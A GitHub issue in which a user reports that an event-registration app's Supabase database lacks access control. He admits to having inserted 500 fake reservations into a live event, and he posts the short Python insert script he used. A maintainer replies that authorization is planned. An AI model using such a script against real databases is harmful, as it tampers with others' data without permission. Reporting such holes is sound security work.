Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Supabase database seems to be unprotected #25

Open
piotr-ginal opened this issue Oct 13, 2024 · 1 comment
Open

Supabase database seems to be unprotected #25

piotr-ginal opened this issue Oct 13, 2024 · 1 comment

Comments

@piotr-ginal
Copy link

Sup, I wanted to bring to your attention that your Supabase database seems to be unprotected. You might want to check out the form for Wyjazd LTSP Lubawka. I've gone ahead and added some additional rooms for you ;)

If there's anything else you need or if you have any questions, feel free to reach out to me

BLOCK_ID = "<redacted>"

def main() -> None:
    supabase: Client = _load_eventownik_supabase_client()

    table_name = "reservations"

    data = []
    for _ in range(500):
        data.append({
            "blockId": BLOCK_ID,
            "firstName": "Name",
            "lastName": "Surname",
            "order": 100,
            "createdAt": "1981-05-13 17:17:55.24756+00",
        })

    supabase.table(table_name).insert(data).execute()

Admin panel for the event mentioned above:

https://eventownik.solvro.pl/event/360c65cc-2d2c-4fa8-a4b9-<redacted>/settings

image

@dawidlinek
Copy link
Member

@piotr-ginal thank you for your input. Eventownik was at a stage when we just tested the concept. LTSP was out internal event so weve tested the MVP. Now we are moving to refine our product and add some functionalities like f.ex. authorization. We probaly spend some time at it, becouse its tricky, espacially becouse we use supabase.

If you want to help and you are a student from Wrocław we are currently recruting new members. Write to us at [email protected]

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

2 participants